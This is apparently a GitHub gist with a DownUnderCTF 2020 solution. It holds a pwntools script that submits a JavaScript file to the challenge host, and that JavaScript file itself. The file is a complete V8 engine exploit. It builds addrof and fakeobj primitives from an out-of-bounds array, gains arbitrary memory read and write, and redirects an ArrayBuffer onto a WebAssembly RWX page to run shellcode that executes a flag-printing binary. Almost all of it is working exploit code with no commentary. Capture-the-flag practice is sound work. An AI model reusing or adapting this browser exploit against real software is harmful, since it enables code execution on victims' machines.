Created
September 18, 2020 22:04
-
-
Save KaoRz/8d37865f94f73f240c562f9ab29ee1e2 to your computer and use it in GitHub Desktop.
Is this pwn or web? - DownUnderCTF 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| HOST = "chal.duc.tf" | |
| PORT = 30004 | |
| XPL_PATH = "./pwn.js" | |
| f_xpl = open(XPL_PATH, "r") | |
| data_xpl = f_xpl.read() | |
| io = remote(HOST, PORT) | |
| io.recvuntil("max 100KB): ") | |
| io.sendline(str(len(data_xpl))) | |
| io.sendline(data_xpl) | |
| flag = io.recvline_startswith("DUCT") | |
| log.success("FLAG --> " + str(flag)) | |
| io.close() | |
| # DUCTF{y0u_4r3_a_futUR3_br0ws3r_pwn_pr0d1gy!!} | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var aux_obj = {"a": 1} | |
| var aux_obj_arr = [aux_obj]; | |
| var aux_float_arr = [1.1, 2.2, 3.3]; | |
| var aux_arr = aux_float_arr.slice(aux_float_arr) | |
| var buf = new ArrayBuffer(8); | |
| var f64_buf = new Float64Array(buf); | |
| var u64_buf = new Uint32Array(buf); | |
| function ftoi(val, size) { | |
| f64_buf[0] = val; | |
| if(size == 32) { | |
| return BigInt(u64_buf[0]); | |
| } else if(size == 64) { | |
| return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
| } | |
| } | |
| function itof(val, size) { | |
| if(size == 32) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| } else if(size == 64) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| u64_buf[1] = Number(val >> 32n); | |
| } | |
| return f64_buf[0]; | |
| } | |
| var flt_arr_map = ftoi(aux_arr[3], 32); | |
| var elem_arr_ptr = ftoi(aux_arr[4], 32); | |
| console.log("[+] Float array map: 0x" + flt_arr_map.toString(16)); | |
| console.log("[+] Pointer to array elements: 0x" + elem_arr_ptr.toString(16)); | |
| var elem_obj_arr = elem_arr_ptr - 0xc0n | |
| aux_arr[4] = itof((ftoi(aux_arr[4], 64) & 0xffffffff00000000n) + elem_obj_arr, 64); | |
| if(ftoi(aux_arr[0], 32) < 0x1000) { | |
| elem_obj_arr += 4n; | |
| aux_arr = aux_float_arr.slice(aux_float_arr) | |
| aux_arr[4] = itof((ftoi(aux_arr[4], 64) & 0xffffffff00000000n) + elem_obj_arr, 64); | |
| } | |
| console.log("[+] Pointer to object array elements: 0x" + elem_obj_arr.toString(16)); | |
| var obj_arr_map = ftoi(aux_arr[0], 64) >> 32n; | |
| console.log("[+] Object array map: 0x" + obj_arr_map.toString(16)); | |
| function addrof(obj) { | |
| aux_arr = aux_float_arr.slice(aux_float_arr) | |
| aux_arr[4] = itof((ftoi(aux_arr[4], 64) & 0xffffffff00000000n) + elem_obj_arr, 64); | |
| aux_obj_arr[0] = obj; | |
| return ftoi(aux_arr[0], 32) | |
| } | |
| function fakeobj(addr) { | |
| let fake; | |
| aux_arr = aux_float_arr.slice(aux_float_arr); | |
| aux_arr[0] = itof(addr, 32); | |
| aux_arr[3] = itof((ftoi(aux_arr[3], 64) & 0xffffffff00000000n) + obj_arr_map, 64); | |
| fake = aux_arr[0]; | |
| return fake; | |
| } | |
| var rw_helper = [itof(flt_arr_map, 64), 1.1, 2.2, 3.3]; | |
| var rw_helper_addr = addrof(rw_helper) & 0xffffffffn; | |
| console.log("[+] Controlled RW helper address: 0x" + rw_helper_addr.toString(16)); | |
| function arb_read(addr) { | |
| let fake = fakeobj(rw_helper_addr - 0x20n); | |
| rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64); | |
| return ftoi(fake[0], 64); | |
| } | |
| function arb_write(addr, value) { | |
| let fake = fakeobj(rw_helper_addr - 0x20n); | |
| rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64); | |
| fake[0] = itof(value, 64); | |
| } | |
| var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3, | |
| 130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131, | |
| 128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128, | |
| 128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0, | |
| 0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]); | |
| var wasm_module = new WebAssembly.Module(wasmCode); | |
| var wasm_instance = new WebAssembly.Instance(wasm_module); | |
| var pwn = wasm_instance.exports.main; | |
| var wasm_instance_addr = addrof(wasm_instance) & 0xffffffffn; | |
| var rwx = arb_read(wasm_instance_addr + 0x68n); | |
| console.log("[+] Wasm instance address: 0x" + wasm_instance_addr.toString(16)); | |
| console.log("[+] RWX section address: 0x" + rwx.toString(16)); | |
| var arr_buf = new ArrayBuffer(0x100); | |
| var dataview = new DataView(arr_buf); | |
| var arr_buf_addr = addrof(arr_buf) & 0xffffffffn;; | |
| var back_store_addr = arb_read(arr_buf_addr + 0x14n); | |
| console.log("[+] ArrayBuffer address: 0x" + arr_buf_addr.toString(16)); | |
| console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16)); | |
| arb_write(arr_buf_addr + 0x14n, rwx); | |
| var shellcode = [0x6a,0x72,0x48,0xb8,0x61,0x67,0x70,0x72,0x69,0x6e,0x74, | |
| 0x65,0x50,0x48,0xb8,0x2f,0x63,0x68,0x61,0x6c,0x2f,0x66, | |
| 0x6c,0x50,0x48,0x89,0xe7,0x48,0x31,0xd2,0x48,0x31,0xf6, | |
| 0x48,0xc7,0xc0,0x3b,0x00,0x00,0x00,0x0f,0x05]; | |
| for (let i = 0; i < shellcode.length; i++) { | |
| dataview.setUint8(i, shellcode[i], true); | |
| } | |
| console.log("[+] Spawning a calculator or a shell..."); | |
| pwn(); | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment